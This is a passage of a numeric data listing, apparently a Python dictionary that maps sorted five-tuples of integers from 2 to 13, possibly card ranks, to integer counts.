(2, 5, 5, 6, 6): 7,
(2, 5, 5, 6, 7): 11,
(2, 5, 5, 6, 8): 14,
(2, 5, 5, 6, 9): 15,
(2, 5, 5, 6, 10): 14,
(2, 5, 5, 6, 11): 9,
(2, 5, 5, 6, 12): 10,
(2, 5, 5, 6, 13): 10,
(2, 5, 5, 7, 7): 8,
(2, 5, 5, 7, 8): 13,
(2, 5, 5, 7, 9): 12,
(2, 5, 5, 7, 10): 13,
(2, 5, 5, 7, 11): 9,
(2, 5, 5, 7, 12): 13,
(2, 5, 5, 7, 13): 9,
(2, 5, 5, 8, 8): 7,
(2, 5, 5, 8, 9): 7,
(2, 5, 5, 8, 10): 14,
(2, 5, 5, 8, 11): 7,
(2, 5, 5, 8, 12): 12,
(2, 5, 5, 8, 13): 13,
(2, 5, 5, 9, 9): 5,
(2, 5, 5, 9, 10): 10,
(2, 5, 5, 9, 11): 10,
(2, 5, 5, 9, 12): 10,
(2, 5, 5, 9, 13): 14,
(2, 5, 5, 10, 10): 5,
(2, 5, 5, 10, 11): 10,
(2, 5, 5, 10, 12): 14,
(2, 5, 5, 10, 13): 5,
(2, 5, 5, 11, 11): 5,
(2, 5, 5, 11, 12): 6,
(2, 5, 5, 11, 13): 5,
(2, 5, 5, 12, 12): 4,
(2, 5, 5, 12, 13): 10,
(2, 5, 5, 13, 13): 3,
(2, 5, 6, 6, 6): 6,
(2, 5, 6, 6, 7): 11,
(2, 5, 6, 6, 8): 16,
(2, 5, 6, 6, 9): 26,
(2, 5, 6, 6, 10): 15,
(2, 5, 6, 6, 11): 7,
(2, 5, 6, 6, 12): 26,
(2, 5, 6, 6, 13): 8,
(2, 5, 6, 7, 7): 11,
(2, 5, 6, 7, 8): 22,
(2, 5, 6, 7, 9): 26,
(2, 5, 6, 7, 10): 18,
(2, 5, 6, 7, 11): 22,
(2, 5, 6, 7, 12): 30,
(2, 5, 6, 7, 13): 21,
(2, 5, 6, 8, 8): 15,
(2, 5, 6, 8, 9): 14,
(2, 5, 6, 8, 10): 29,
(2, 5, 6, 8, 11): 18,
(2, 5, 6, 8, 12): 29,
(2, 5, 6, 8, 13): 23,
(2, 5, 6, 9, 9): 14,
(2, 5, 6, 9, 10): 18,
(2, 5, 6, 9, 11): 24,
(2, 5, 6, 9, 12): 30,
(2, 5, 6, 9, 13): 17,
(2, 5, 6, 10, 10): 15,
(2, 5, 6, 10, 11): 25,
(2, 5, 6, 10, 12): 28,
(2, 5, 6, 10, 13): 15,
(2, 5, 6, 11, 11): 5,
(2, 5, 6, 11, 12): 20,
(2, 5, 6, 11, 13): 14,
(2, 5, 6, 12, 12): 20,
(2, 5, 6, 12, 13): 19,
(2, 5, 6, 13, 13): 5,
(2, 5, 7, 7, 7): 15,
(2, 5, 7, 7, 8): 13,
(2, 5, 7, 7, 9): 20,
(2, 5, 7, 7, 10): 18,
(2, 5, 7, 7, 11): 7,
(2, 5, 7, 7, 12): 14,
(2, 5, 7, 7, 13): 10,
(2, 5, 7, 8, 8): 6,
(2, 5, 7, 8, 9): 29,
(2, 5, 7, 8, 10): 23,
(2, 5, 7, 8, 11): 21,
(2, 5, 7, 8, 12): 30,
(2, 5, 7, 8, 13): 12,
(2, 5, 7, 9, 9): 7,
(2, 5, 7, 9, 10): 17,
(2, 5, 7, 9, 11): 19,
(2, 5, 7, 9, 12): 27,
(2, 5, 7, 9, 13): 18,
(2, 5, 7, 10, 10): 14,
(2, 5, 7, 10, 11): 13,
(2, 5, 7, 10, 12): 23,
(2, 5, 7, 10, 13): 25,
(2, 5, 7, 11, 11): 12,
(2, 5, 7, 11, 12): 20,
(2, 5, 7, 11, 13): 11,
(2, 5, 7, 12, 12): 8,
(2, 5, 7, 12, 13): 18,
(2, 5, 7, 13, 13): 5,
(2, 5, 8, 8, 8): 4,
(2, 5, 8, 8, 9): 10,
(2, 5, 8, 8, 10): 20,
(2, 5, 8, 8, 11): 5,
(2, 5, 8, 8, 12): 15,
(2, 5, 8, 8, 13): 8,
(2, 5, 8, 9, 9): 11,
(2, 5, 8, 9, 10): 20,
(2, 5, 8, 9, 11): 14,
(2, 5, 8, 9, 12): 16,
(2, 5, 8, 9, 13): 21,
(2, 5, 8, 10, 10): 14,
(2, 5, 8, 10, 11): 16,
(2, 5, 8, 10, 12): 31,
(2, 5, 8, 10, 13): 12,
(2, 5, 8, 11, 11): 9,
(2, 5, 8, 11, 12): 12,
(2, 5, 8, 11, 13): 15,
(2, 5, 8, 12, 12): 11,
(2, 5, 8, 12, 13): 12,
(2, 5, 8, 13, 13): 5,
(2, 5, 9, 9, 9): 4,
(2, 5, 9, 9, 10): 8,
(2, 5, 9, 9, 11): 3,
(2, 5, 9, 9, 12): 13,
(2, 5, 9, 9, 13): 6,
(2, 5, 9, 10, 10): 11,
(2, 5, 9, 10, 11): 21,
(2, 5, 9, 10, 12): 12,
(2, 5, 9, 10, 13): 10,
(2, 5, 9, 11, 11): 12,
(2, 5, 9, 11, 12): 18,
(2, 5, 9, 11, 13): 10,
(2, 5, 9, 12, 12): 17,
(2, 5, 9, 12, 13): 18,
(2, 5, 9, 13, 13): 10,
(2, 5, 10, 10, 10): 5,
(2, 5, 10, 10, 11): 10,
(2, 5, 10, 10, 12): 14,
(2, 5, 10, 10, 13): 7,
(2, 5, 10, 11, 11): 7,
(2, 5, 10, 11, 12): 17,
(2, 5, 10, 11, 13): 12,
(2, 5, 10, 12, 12): 9,
(2, 5, 10, 12, 13): 18,
(2, 5, 10, 13, 13): 6,
(2, 5, 11, 11, 11): 1,
(2, 5, 11, 11, 12): 7,
(2, 5, 11, 11, 13): 8,
(2, 5, 11, 12, 12): 7,
(2, 5, 11, 12, 13): 10,
(2, 5, 11, 13, 13): 9,
(2, 5, 12, 12, 12): 9,
(2, 5, 12, 12, 13): 5,
(2, 5, 12, 13, 13): 5,
(2, 5, 13, 13, 13): 4,
(2, 6, 6, 6, 6): 6,
(2, 6, 6, 6, 7): 7,
(2, 6, 6, 6, 8): 12,
(2, 6, 6, 6, 9): 12,
(2, 6, 6, 6, 10): 9,
(2, 6, 6, 6, 11): 8,
(2, 6, 6, 6, 12): 16,
(2, 6, 6, 6, 13): 7,
(2, 6, 6, 7, 7): 9,
(2, 6, 6, 7, 8): 14,
(2, 6, 6, 7, 9): 13,
(2, 6, 6, 7, 10): 10,
(2, 6, 6, 7, 11): 9,
(2, 6, 6, 7, 12): 13,
(2, 6, 6, 7, 13): 9,
(2, 6, 6, 8, 8): 6,
(2, 6, 6, 8, 9): 22,
(2, 6, 6, 8, 10): 18,
(2, 6, 6, 8, 11): 14,
(2, 6, 6, 8, 12): 28,
(2, 6, 6, 8, 13): 7,
(2, 6, 6, 9, 9): 11,
(2, 6, 6, 9, 10): 20,
(2, 6, 6, 9, 11): 17,
(2, 6, 6, 9, 12): 32,
(2, 6, 6, 9, 13): 11,
(2, 6, 6, 10, 10): 8,
(2, 6, 6, 10, 11): 7,
(2, 6, 6, 10, 12): 26,
(2, 6, 6, 10, 13): 9,
(2, 6, 6, 11, 11): 2,
(2, 6, 6, 11, 12): 13,
(2, 6, 6, 11, 13): 5,
(2, 6, 6, 12, 12): 23,
(2, 6, 6, 12, 13): 13,
(2, 6, 6, 13, 13): 6,
(2, 6, 7, 7, 7): 8,
(2, 6, 7, 7, 8): 16,
(2, 6, 7, 7, 9): 10,
(2, 6, 7, 7, 10): 12,
(2, 6, 7, 7, 11): 9,
(2, 6, 7, 7, 12): 11,
(2, 6, 7, 7, 13): 9,
(2, 6, 7, 8, 8): 17,
(2, 6, 7, 8, 9): 11,
(2, 6, 7, 8, 10): 21,
(2, 6, 7, 8, 11): 11,
(2, 6, 7, 8, 12): 20,
(2, 6, 7, 8, 13): 19,
(2, 6, 7, 9, 9): 19,
(2, 6, 7, 9, 10): 15,
(2, 6, 7, 9, 11): 13,
(2, 6, 7, 9, 12): 34,
(2, 6, 7, 9, 13): 12,
(2, 6, 7, 10, 10): 9,
(2, 6, 7, 10, 11): 13,
(2, 6, 7, 10, 12): 23,
(2, 6, 7, 10, 13): 18,
(2, 6, 7, 11, 11): 6,
(2, 6, 7, 11, 12): 13,
(2, 6, 7, 11, 13): 11,
(2, 6, 7, 12, 12): 20,
(2, 6, 7, 12, 13): 17,
(2, 6, 7, 13, 13): 6,
(2, 6, 8, 8, 8): 7,
(2, 6, 8, 8, 9): 15,
(2, 6, 8, 8, 10): 21,
(2, 6, 8, 8, 11): 14,
(2, 6, 8, 8, 12): 16,
(2, 6, 8, 8, 13): 9,
(2, 6, 8, 9, 9): 16,
(2, 6, 8, 9, 10): 23,
(2, 6, 8, 9, 11): 7,
(2, 6, 8, 9, 12): 41,
(2, 6, 8, 9, 13): 12,
(2, 6, 8, 10, 10): 12,
(2, 6, 8, 10, 11): 23,
(2, 6, 8, 10, 12): 31,
(2, 6, 8, 10, 13): 30,
(2, 6, 8, 11, 11): 10,
(2, 6, 8, 11, 12): 30,
(2, 6, 8, 11, 13): 10,
(2, 6, 8, 12, 12): 17,
(2, 6, 8, 12, 13): 19,
(2, 6, 8, 13, 13): 9,
(2, 6, 9, 9, 9): 7,
(2, 6, 9, 9, 10): 13,
(2, 6, 9, 9, 11): 9,
(2, 6, 9, 9, 12): 18,
(2, 6, 9, 9, 13): 12,
(2, 6, 9, 10, 10): 7,
(2, 6, 9, 10, 11): 14,
(2, 6, 9, 10, 12): 35,
(2, 6, 9, 10, 13): 6,
(2, 6, 9, 11, 11): 8,
(2, 6, 9, 11, 12): 20,
(2, 6, 9, 11, 13): 14,
(2, 6, 9, 12, 12): 19,
(2, 6, 9, 12, 13): 21,
(2, 6, 9, 13, 13): 6,
(2, 6, 10, 10, 10): 7,
(2, 6, 10, 10, 11): 9,
(2, 6, 10, 10, 12): 14,
(2, 6, 10, 10, 13): 9,
(2, 6, 10, 11, 11): 6,
(2, 6, 10, 11, 12): 17,
(2, 6, 10, 11, 13): 12,
(2, 6, 10, 12, 12): 20,
(2, 6, 10, 12, 13): 15,
(2, 6, 10, 13, 13): 7,
(2, 6, 11, 11, 11): 2,
(2, 6, 11, 11, 12): 8,
(2, 6, 11, 11, 13): 7,
(2, 6, 11, 12, 12): 14,
(2, 6, 11, 12, 13): 8,
(2, 6, 11, 13, 13): 7,
(2, 6, 12, 12, 12): 7,
(2, 6, 12, 12, 13): 14,
(2, 6, 12, 13, 13): 6,
(2, 6, 13, 13, 13): 2,
(2, 7, 7, 7, 7): 5,
(2, 7, 7, 7, 8): 5,
(2, 7, 7, 7, 9): 7,
(2, 7, 7, 7, 10): 9,
(2, 7, 7, 7, 11): 7,
(2, 7, 7, 7, 12): 4,
(2, 7, 7, 7, 13): 8,
(2, 7, 7, 8, 8): 5,
(2, 7, 7, 8, 9): 13,
(2, 7, 7, 8, 10): 9,
(2, 7, 7, 8, 11): 9,
(2, 7, 7, 8, 12): 12,
(2, 7, 7, 8, 13): 8,
(2, 7, 7, 9, 9): 2,
(2, 7, 7, 9, 10): 9,
(2, 7, 7, 9, 11): 10,
(2, 7, 7, 9, 12): 14,
(2, 7, 7, 9, 13): 11,
(2, 7, 7, 10, 10): 7,
(2, 7, 7, 10, 11): 8,
(2, 7, 7, 10, 12): 15,
(2, 7, 7, 10, 13): 5,
(2, 7, 7, 11, 11): 5,
(2, 7, 7, 11, 12): 11,
(2, 7, 7, 11, 13): 6,
(2, 7, 7, 12, 12): 5,
(2, 7, 7, 12, 13): 9,
(2, 7, 7, 13, 13): 8,
(2, 7, 8, 8, 8): 3,
(2, 7, 8, 8, 9): 4,
(2, 7, 8, 8, 10): 11,
(2, 7, 8, 8, 11): 6,
(2, 7, 8, 8, 12): 13,
(2, 7, 8, 8, 13): 8,
(2, 7, 8, 9, 9): 4,
(2, 7, 8, 9, 10): 15,
(2, 7, 8, 9, 11): 19,
(2, 7, 8, 9, 12): 8,
(2, 7, 8, 9, 13): 14,
(2, 7, 8, 10, 10): 13,
(2, 7, 8, 10, 11): 10,
(2, 7, 8, 10, 12): 20,
(2, 7, 8, 10, 13): 7,
(2, 7, 8, 11, 11): 8,
(2, 7, 8, 11, 12): 8,
(2, 7, 8, 11, 13): 13,
(2, 7, 8, 12, 12): 15,
(2, 7, 8, 12, 13): 10,
(2, 7, 8, 13, 13): 4,
(2, 7, 9, 9, 9): 2,
(2, 7, 9, 9, 10): 9,
(2, 7, 9, 9, 11): 5,
(2, 7, 9, 9, 12): 12,
(2, 7, 9, 9, 13): 5,
(2, 7, 9, 10, 10): 11,
(2, 7, 9, 10, 11): 10,
(2, 7, 9, 10, 12): 10,
(2, 7, 9, 10, 13): 16,
(2, 7, 9, 11, 11): 7,
(2, 7, 9, 11, 12): 17,
(2, 7, 9, 11, 13): 11,
(2, 7, 9, 12, 12): 13,
(2, 7, 9, 12, 13): 14,
(2, 7, 9, 13, 13): 4,
(2, 7, 10, 10, 10): 2,
(2, 7, 10, 10, 11): 6,
(2, 7, 10, 10, 12): 9,
(2, 7, 10, 10, 13): 8,
(2, 7, 10, 11, 11): 7,
(2, 7, 10, 11, 12): 15,
(2, 7, 10, 11, 13): 12,
(2, 7, 10, 12, 12): 11,
(2, 7, 10, 12, 13): 10,
(2, 7, 10, 13, 13): 8,
(2, 7, 11, 11, 11): 3,
(2, 7, 11, 11, 12): 6,
(2, 7, 11, 11, 13): 4,
(2, 7, 11, 12, 12): 5,
(2, 7, 11, 12, 13): 8,
(2, 7, 11, 13, 13): 5,
(2, 7, 12, 12, 12): 2,
(2, 7, 12, 12, 13): 9,
(2, 7, 12, 13, 13): 5,
(2, 7, 13, 13, 13): 2,
(2, 8, 8, 8, 8): 1,
(2, 8, 8, 8, 9): 3,
(2, 8, 8, 8, 10): 3,
(2, 8, 8, 8, 11): 3,
(2, 8, 8, 8, 12): 5,
(2, 8, 8, 8, 13): 3,
(2, 8, 8, 9, 9): 2,
(2, 8, 8, 9, 10): 5,
(2, 8, 8, 9, 11): 7,
(2, 8, 8, 9, 12): 12,
(2, 8, 8, 9, 13): 3,
(2, 8, 8, 10, 10): 11,
(2, 8, 8, 10, 11): 9,
(2, 8, 8, 10, 12): 10,
(2, 8, 8, 10, 13): 6,
(2, 8, 8, 11, 11): 4,
(2, 8, 8, 11, 12): 10,
(2, 8, 8, 11, 13): 3,
(2, 8, 8, 12, 12): 7,
(2, 8, 8, 12, 13): 13,
(2, 8, 8, 13, 13): 3,
(2, 8, 9, 9, 10): 2,
(2, 8, 9, 9, 11): 6,
(2, 8, 9, 9, 12): 11,
(2, 8, 9, 9, 13): 5,
(2, 8, 9, 10, 10): 6,
(2, 8, 9, 10, 11): 14,
(2, 8, 9, 10, 12): 18,
(2, 8, 9, 10, 13): 11,
(2, 8, 9, 11, 11): 4,
(2, 8, 9, 11, 12): 9,
(2, 8, 9, 11, 13): 14,
(2, 8, 9, 12, 12): 14,
(2, 8, 9, 12, 13): 5,
(2, 8, 9, 13, 13): 6,
(2, 8, 10, 10, 10): 4,
(2, 8, 10, 10, 11): 4,
(2, 8, 10, 10, 12): 16,
(2, 8, 10, 10, 13): 9,
(2, 8, 10, 11, 11): 5,
(2, 8, 10, 11, 12): 19,
(2, 8, 10, 11, 13): 9,
(2, 8, 10, 12, 12): 6,
(2, 8, 10, 12, 13): 15,
(2, 8, 10, 13, 13): 4,
(2, 8, 11, 11, 11): 1,
(2, 8, 11, 11, 12): 7,
(2, 8, 11, 11, 13): 8,
(2, 8, 11, 12, 12): 9,
(2, 8, 11, 12, 13): 9,
(2, 8, 11, 13, 13): 3,
(2, 8, 12, 12, 12): 8,
(2, 8, 12, 12, 13): 7,
(2, 8, 12, 13, 13): 7,
(2, 8, 13, 13, 13): 3,
(2, 9, 9, 9, 11): 2,
(2, 9, 9, 9, 12): 7,
(2, 9, 9, 9, 13): 2,
(2, 9, 9, 10, 10): 1,
(2, 9, 9, 10, 11): 4,
(2, 9, 9, 10, 12): 12,
(2, 9, 9, 10, 13): 5,
(2, 9, 9, 11, 11): 4,
(2, 9, 9, 11, 12): 6,
(2, 9, 9, 11, 13): 3,
(2, 9, 9, 12, 12): 7,
(2, 9, 9, 12, 13): 7,
(2, 9, 9, 13, 13): 2,
(2, 9, 10, 10, 10): 1,
(2, 9, 10, 10, 11): 7,
(2, 9, 10, 10, 12): 5,
(2, 9, 10, 10, 13): 9,
(2, 9, 10, 11, 11): 4,
(2, 9, 10, 11, 12): 9,
(2, 9, 10, 11, 13): 9,
(2, 9, 10, 12, 12): 9,
(2, 9, 10, 12, 13): 10,
(2, 9, 10, 13, 13): 4,
(2, 9, 11, 11, 11): 4,
(2, 9, 11, 11, 12): 7,
(2, 9, 11, 11, 13): 7,
(2, 9, 11, 12, 12): 9,
(2, 9, 11, 12, 13): 12,
(2, 9, 11, 13, 13): 5,
(2, 9, 12, 12, 12): 7,
(2, 9, 12, 12, 13): 10,
(2, 9, 12, 13, 13): 4,
(2, 9, 13, 13, 13): 1,
(2, 10, 10, 10, 10): 2,
(2, 10, 10, 10, 11): 1,
(2, 10, 10, 10, 12): 4,
(2, 10, 10, 10, 13): 2,
(2, 10, 10, 11, 11): 5,
(2, 10, 10, 11, 12): 4,
(2, 10, 10, 11, 13): 6,
(2, 10, 10, 12, 12): 4,
(2, 10, 10, 12, 13): 9,
(2, 10, 10, 13, 13): 3,
(2, 10, 11, 11, 11): 1,
(2, 10, 11, 11, 12): 7,
(2, 10, 11, 11, 13): 5,
(2, 10, 11, 12, 12): 7,
(2, 10, 11, 12, 13): 7,
(2, 10, 11, 13, 13): 7,
(2, 10, 12, 12, 12): 3,
(2, 10, 12, 12, 13): 8,
(2, 10, 12, 13, 13): 6,
(2, 10, 13, 13, 13): 1,
(2, 11, 11, 11, 11): 2,
(2, 11, 11, 11, 12): 1,
(2, 11, 11, 11, 13): 3,
(2, 11, 11, 12, 12): 1,
(2, 11, 11, 12, 13): 7,
(2, 11, 11, 13, 13): 1,
(2, 11, 12, 12, 12): 1,
(2, 11, 12, 12, 13): 2,
(2, 11, 12, 13, 13): 2,
(2, 12, 12, 12, 12): 1,
(3, 3, 3, 3, 4): 5,
(3, 3, 3, 3, 5): 4,
(3, 3, 3, 3, 6): 6,
(3, 3, 3, 3, 7): 3,
(3, 3, 3, 3, 8): 4,
(3, 3, 3, 3, 9): 2,
(3, 3, 3, 3, 10): 2,
(3, 3, 3, 3, 11): 2,
(3, 3, 3, 3, 12): 6,
(3, 3, 3, 3, 13): 4,
(3, 3, 3, 4, 4): 3,
(3, 3, 3, 4, 5): 8,
(3, 3, 3, 4, 6): 11,
(3, 3, 3, 4, 7): 9,
(3, 3, 3, 4, 8): 5,
(3, 3, 3, 4, 9): 14,
(3, 3, 3, 4, 10): 5,
(3, 3, 3, 4, 11): 8,
(3, 3, 3, 4, 12): 9,
(3, 3, 3, 4, 13): 3,
(3, 3, 3, 5, 5): 3,
(3, 3, 3, 5, 6): 16,
(3, 3, 3, 5, 7): 4,
(3, 3, 3, 5, 8): 7,
(3, 3, 3, 5, 9): 9,
(3, 3, 3, 5, 10): 9,
(3, 3, 3, 5, 11): 2,
(3, 3, 3, 5, 12): 8,
(3, 3, 3, 5, 13): 2,
(3, 3, 3, 6, 6): 7,
(3, 3, 3, 6, 7): 10,
(3, 3, 3, 6, 8): 7,
(3, 3, 3, 6, 9): 17,
(3, 3, 3, 6, 10): 11,
(3, 3, 3, 6, 11): 12,
(3, 3, 3, 6, 12): 11,
(3, 3, 3, 6, 13): 9,
(3, 3, 3, 7, 7): 4,
(3, 3, 3, 7, 8): 7,
(3, 3, 3, 7, 9): 7,
(3, 3, 3, 7, 10): 5,
(3, 3, 3, 7, 11): 3,
(3, 3, 3, 7, 12): 12,
(3, 3, 3, 7, 13): 1,
(3, 3, 3, 8, 8): 2,
(3, 3, 3, 8, 9): 9,
(3, 3, 3, 8, 10): 3,
(3, 3, 3, 8, 11): 4,
(3, 3, 3, 8, 12): 6,
(3, 3, 3, 8, 13): 7,
(3, 3, 3, 9, 9): 4,
(3, 3, 3, 9, 10): 7,
(3, 3, 3, 9, 11): 7,
(3, 3, 3, 9, 12): 14,
(3, 3, 3, 9, 13): 11,
(3, 3, 3, 10, 10): 1,
(3, 3, 3, 10, 11): 6,
(3, 3, 3, 10, 12): 5,
(3, 3, 3, 10, 13): 7,
(3, 3, 3, 11, 11): 1,
(3, 3, 3, 11, 12): 7,
(3, 3, 3, 11, 13): 1,
(3, 3, 3, 12, 12): 8,
(3, 3, 3, 12, 13): 6,
(3, 3, 4, 4, 5): 6,
(3, 3, 4, 4, 6): 17,
(3, 3, 4, 4, 7): 6,
(3, 3, 4, 4, 8): 7,
(3, 3, 4, 4, 9): 7,
(3, 3, 4, 4, 10): 10,
(3, 3, 4, 4, 11): 3,
(3, 3, 4, 4, 12): 6,
(3, 3, 4, 4, 13): 4,
(3, 3, 4, 5, 5): 5,
(3, 3, 4, 5, 6): 12,
(3, 3, 4, 5, 7): 16,
(3, 3, 4, 5, 8): 13,
(3, 3, 4, 5, 9): 19,
(3, 3, 4, 5, 10): 10,
(3, 3, 4, 5, 11): 9,
(3, 3, 4, 5, 12): 19,
(3, 3, 4, 5, 13): 11,
(3, 3, 4, 6, 6): 13,
(3, 3, 4, 6, 7): 14,
(3, 3, 4, 6, 8): 24,
(3, 3, 4, 6, 9): 25,
(3, 3, 4, 6, 10): 20,
(3, 3, 4, 6, 11): 12,
(3, 3, 4, 6, 12): 32,
(3, 3, 4, 6, 13): 11,
(3, 3, 4, 7, 7): 8,
(3, 3, 4, 7, 8): 8,
(3, 3, 4, 7, 9): 20,
(3, 3, 4, 7, 10): 17,
(3, 3, 4, 7, 11): 15,
(3, 3, 4, 7, 12): 11,
(3, 3, 4, 7, 13): 8,
(3, 3, 4, 8, 8): 2,
(3, 3, 4, 8, 9): 12,
(3, 3, 4, 8, 10): 15,
(3, 3, 4, 8, 11): 10,
(3, 3, 4, 8, 12): 10,
(3, 3, 4, 8, 13): 8,
(3, 3, 4, 9, 9): 15,
(3, 3, 4, 9, 10): 12,
(3, 3, 4, 9, 11): 15,
(3, 3, 4, 9, 12): 16,
(3, 3, 4, 9, 13): 11,
(3, 3, 4, 10, 10): 3,
(3, 3, 4, 10, 11): 9,
(3, 3, 4, 10, 12): 27,
(3, 3, 4, 10, 13): 12,
(3, 3, 4, 11, 11): 4,
(3, 3, 4, 11, 12): 12,
(3, 3, 4, 11, 13): 10,
(3, 3, 4, 12, 12): 7,
(3, 3, 4, 12, 13): 6,
(3, 3, 4, 13, 13): 7,
(3, 3, 5, 5, 5): 3,
(3, 3, 5, 5, 6): 9,
(3, 3, 5, 5, 7): 6,
(3, 3, 5, 5, 8): 8,
(3, 3, 5, 5, 9): 3,
(3, 3, 5, 5, 10): 3,
(3, 3, 5, 5, 11): 5,
(3, 3, 5, 5, 12): 13,
(3, 3, 5, 5, 13): 6,
(3, 3, 5, 6, 6): 16,
(3, 3, 5, 6, 7): 25,
(3, 3, 5, 6, 8): 13,
(3, 3, 5, 6, 9): 31,
(3, 3, 5, 6, 10): 15,
(3, 3, 5, 6, 11): 16,
(3, 3, 5, 6, 12): 20,
(3, 3, 5, 6, 13): 15,
(3, 3, 5, 7, 7): 7,
(3, 3, 5, 7, 8): 10,
(3, 3, 5, 7, 9): 11,
(3, 3, 5, 7, 10): 14,
(3, 3, 5, 7, 11): 10,
(3, 3, 5, 7, 12): 18,
(3, 3, 5, 7, 13): 10,
(3, 3, 5, 8, 8): 5,
(3, 3, 5, 8, 9): 14,
(3, 3, 5, 8, 10): 17,
(3, 3, 5, 8, 11): 15,
(3, 3, 5, 8, 12): 8,
(3, 3, 5, 8, 13): 5,
(3, 3, 5, 9, 9): 17,
(3, 3, 5, 9, 10): 22,
(3, 3, 5, 9, 11): 4,
(3, 3, 5, 9, 12): 24,
(3, 3, 5, 9, 13): 5,
(3, 3, 5, 10, 10): 5,
(3, 3, 5, 10, 11): 3,
(3, 3, 5, 10, 12): 15,
(3, 3, 5, 10, 13): 14,
(3, 3, 5, 11, 11): 5,
(3, 3, 5, 11, 12): 14,
(3, 3, 5, 11, 13): 10,
(3, 3, 5, 12, 12): 11,
(3, 3, 5, 12, 13): 12,
(3, 3, 5, 13, 13): 2,
(3, 3, 6, 6, 6): 8,
(3, 3, 6, 6, 7): 11,
(3, 3, 6, 6, 8): 13,
(3, 3, 6, 6, 9): 16,
(3, 3, 6, 6, 10): 10,
(3, 3, 6, 6, 11): 7,
(3, 3, 6, 6, 12): 25,
(3, 3, 6, 6, 13): 8,
(3, 3, 6, 7, 7): 17,
(3, 3, 6, 7, 8): 14,
(3, 3, 6, 7, 9): 23,
(3, 3, 6, 7, 10): 11,
(3, 3, 6, 7, 11): 14,
(3, 3, 6, 7, 12): 17,
(3, 3, 6, 7, 13): 14,
(3, 3, 6, 8, 8): 14,
(3, 3, 6, 8, 9): 23,
(3, 3, 6, 8, 10): 16,
(3, 3, 6, 8, 11): 3,
(3, 3, 6, 8, 12): 28,
(3, 3, 6, 8, 13): 5,
(3, 3, 6, 9, 9): 12,
(3, 3, 6, 9, 10): 22,
(3, 3, 6, 9, 11): 24,
(3, 3, 6, 9, 12): 35,
(3, 3, 6, 9, 13): 26,
(3, 3, 6, 10, 10): 5,
(3, 3, 6, 10, 11): 5,
(3, 3, 6, 10, 12): 21,
(3, 3, 6, 10, 13): 2,
(3, 3, 6, 11, 11): 5,
(3, 3, 6, 11, 12): 18,
(3, 3, 6, 11, 13): 8,
(3, 3, 6, 12, 12): 19,
(3, 3, 6, 12, 13): 17,
(3, 3, 6, 13, 13): 5,
(3, 3, 7, 7, 7): 3,
(3, 3, 7, 7, 8): 10,
(3, 3, 7, 7, 9): 10,
(3, 3, 7, 7, 10): 4,
(3, 3, 7, 7, 11): 5,
(3, 3, 7, 7, 12): 15,
(3, 3, 7, 7, 13): 5,
(3, 3, 7, 8, 8): 5,
(3, 3, 7, 8, 9): 16,
(3, 3, 7, 8, 10): 9,
(3, 3, 7, 8, 11): 4,
(3, 3, 7, 8, 12): 10,
(3, 3, 7, 8, 13): 14,
(3, 3, 7, 9, 9): 9,
(3, 3, 7, 9, 10): 12,
(3, 3, 7, 9, 11): 8,
(3, 3, 7, 9, 12): 21,
(3, 3, 7, 9, 13): 4,
(3, 3, 7, 10, 10): 9,
(3, 3, 7, 10, 11): 12,
(3, 3, 7, 10, 12): 11,
(3, 3, 7, 10, 13): 5,
(3, 3, 7, 11, 11): 5,
(3, 3, 7, 11, 12): 16,
(3, 3, 7, 11, 13): 5,
(3, 3, 7, 12, 12): 9,
(3, 3, 7, 12, 13): 14,
(3, 3, 7, 13, 13): 8,
(3, 3, 8, 8, 8): 1,
(3, 3, 8, 8, 9): 2,
(3, 3, 8, 8, 10): 6,
(3, 3, 8, 8, 11): 2,
(3, 3, 8, 8, 12): 3,
(3, 3, 8, 8, 13): 5,
(3, 3, 8, 9, 9): 10,
(3, 3, 8, 9, 10): 9,
(3, 3, 8, 9, 11): 11,
(3, 3, 8, 9, 12): 14,
(3, 3, 8, 9, 13): 6,
(3, 3, 8, 10, 10): 5,
(3, 3, 8, 10, 11): 12,
(3, 3, 8, 10, 12): 16,
(3, 3, 8, 10, 13): 5,
(3, 3, 8, 11, 11): 5,
(3, 3, 8, 11, 12): 8,
(3, 3, 8, 11, 13): 6,
(3, 3, 8, 12, 12): 4,
(3, 3, 8, 12, 13): 10,
(3, 3, 8, 13, 13): 2,
(3, 3, 9, 9, 9): 3,
(3, 3, 9, 9, 10): 12,
(3, 3, 9, 9, 11): 8,
(3, 3, 9, 9, 12): 16,
(3, 3, 9, 9, 13): 8,
(3, 3, 9, 10, 10): 3,
(3, 3, 9, 10, 11): 11,
(3, 3, 9, 10, 12): 16,
(3, 3, 9, 10, 13): 8,
(3, 3, 9, 11, 11): 1,
(3, 3, 9, 11, 12): 13,
(3, 3, 9, 11, 13): 6,
(3, 3, 9, 12, 12): 15,
(3, 3, 9, 12, 13): 12,
(3, 3, 9, 13, 13): 3,
(3, 3, 10, 10, 10): 1,
(3, 3, 10, 10, 11): 2,
(3, 3, 10, 10, 12): 6,
(3, 3, 10, 10, 13): 7,
(3, 3, 10, 11, 11): 3,
(3, 3, 10, 11, 12): 7,
(3, 3, 10, 11, 13): 5,
(3, 3, 10, 12, 12): 8,
(3, 3, 10, 12, 13): 11,
(3, 3, 10, 13, 13): 6,
(3, 3, 11, 11, 11): 2,
(3, 3, 11, 11, 12): 5,
(3, 3, 11, 11, 13): 3,
(3, 3, 11, 12, 12): 3,
(3, 3, 11, 12, 13): 7,
(3, 3, 11, 13, 13): 2,
(3, 3, 12, 12, 12): 3,
(3, 3, 12, 12, 13): 2,
(3, 3, 12, 13, 13): 6,
(3, 3, 13, 13, 13): 1,
(3, 4, 4, 4, 5): 1,
(3, 4, 4, 4, 6): 6,
(3, 4, 4, 4, 7): 4,
(3, 4, 4, 4, 8): 4,
(3, 4, 4, 4, 9): 3,
(3, 4, 4, 4, 10): 9,
(3, 4, 4, 4, 11): 3,
(3, 4, 4, 4, 12): 2,
(3, 4, 4, 4, 13): 4,
(3, 4, 4, 5, 5): 4,
(3, 4, 4, 5, 6): 19,
(3, 4, 4, 5, 7): 10,
(3, 4, 4, 5, 8): 7,
(3, 4, 4, 5, 9): 8,
(3, 4, 4, 5, 10): 22,
(3, 4, 4, 5, 11): 15,
(3, 4, 4, 5, 12): 6,
(3, 4, 4, 5, 13): 9,
(3, 4, 4, 6, 6): 12,
(3, 4, 4, 6, 7): 16,
(3, 4, 4, 6, 8): 13,
(3, 4, 4, 6, 9): 27,
(3, 4, 4, 6, 10): 17,
(3, 4, 4, 6, 11): 16,
(3, 4, 4, 6, 12): 28,
(3, 4, 4, 6, 13): 11,
(3, 4, 4, 7, 7): 6,
(3, 4, 4, 7, 8): 12,
